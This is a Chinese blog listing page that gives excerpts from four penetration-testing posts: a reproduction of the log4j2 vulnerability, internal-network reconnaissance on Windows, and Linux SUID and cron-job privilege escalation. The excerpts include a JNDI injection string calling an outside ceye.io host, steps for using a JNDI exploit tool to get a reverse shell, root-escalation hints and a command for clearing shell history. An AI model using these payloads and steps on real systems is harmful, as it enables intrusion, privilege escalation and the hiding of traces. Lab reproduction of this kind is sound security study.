- 博客(4)
- 收藏
- 关注
RSS订阅原创 Apache log4j2漏洞复现
目录步骤一启动环境步骤二检查是否存在log4j2漏洞网站:CEYE - Monitor service for security testing 将这个${jndi:ldap://lbjc0a.ceye.io},输入目标网站步骤三安装jndi注入工具,并且反弹shell1.在kali安装下列这个文件夹git clone GitHub - sayers522/JNDI-Injection-Exploit: JNDI命令注入利用2.进入目录,使用mvn工具打包2.1未进行安装的话,安装mvnapt instal
2024-06-18 22:22:54
354
原创 内网windows本机信息搜集思路以及内网渗透思路
目录内网信息收集分为本机和其他(ip+端口)***本机(当前主机)信息收集思路Ip(判断是否存在其他网络资产)版本及版本号(windows版本漏洞)用户(online,user(admin),全部用户)端口(检查是否存在高危端口漏洞可以利用)补丁(查看有哪些补丁下载和没有下载,然后利用)防火墙 (开放3389端口的入站和出站规则,开启远程登录服务,扫描出不常见端口是否存在高危服务,帮助我们扩大攻击面)进程列表(软件,提权(admin—system),在线用户)软件及版本(看看软件版本是否存在漏洞可以利用,比
2024-06-17 19:35:41
264
原创 linux系统suid提权
注:php 语言除了可以解析以 php 为后缀的文件,还可以解析 php2,php3、php4、#以 root 的身份执行 file.py 得到 root 的 bin/bash。#查看 john 的权限。
2024-06-17 19:27:14
835
原创 linux计划任务提权
发现有 chkrootkit 软件的脚本(rootkit 是黑客用来入侵的工具,chkrootkit是用来检查 rootkit 是否存在的)发现支持 PUT 方法,利用 PUT 文件上传。-- snip -- 假如不是弱口令游戏继续。history -r #删除当前会话历史记录。获得版本信息可以网上搜索看是否存在公开漏洞。msf 成功上线拿到普通用户。
2024-06-17 19:18:53
675
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人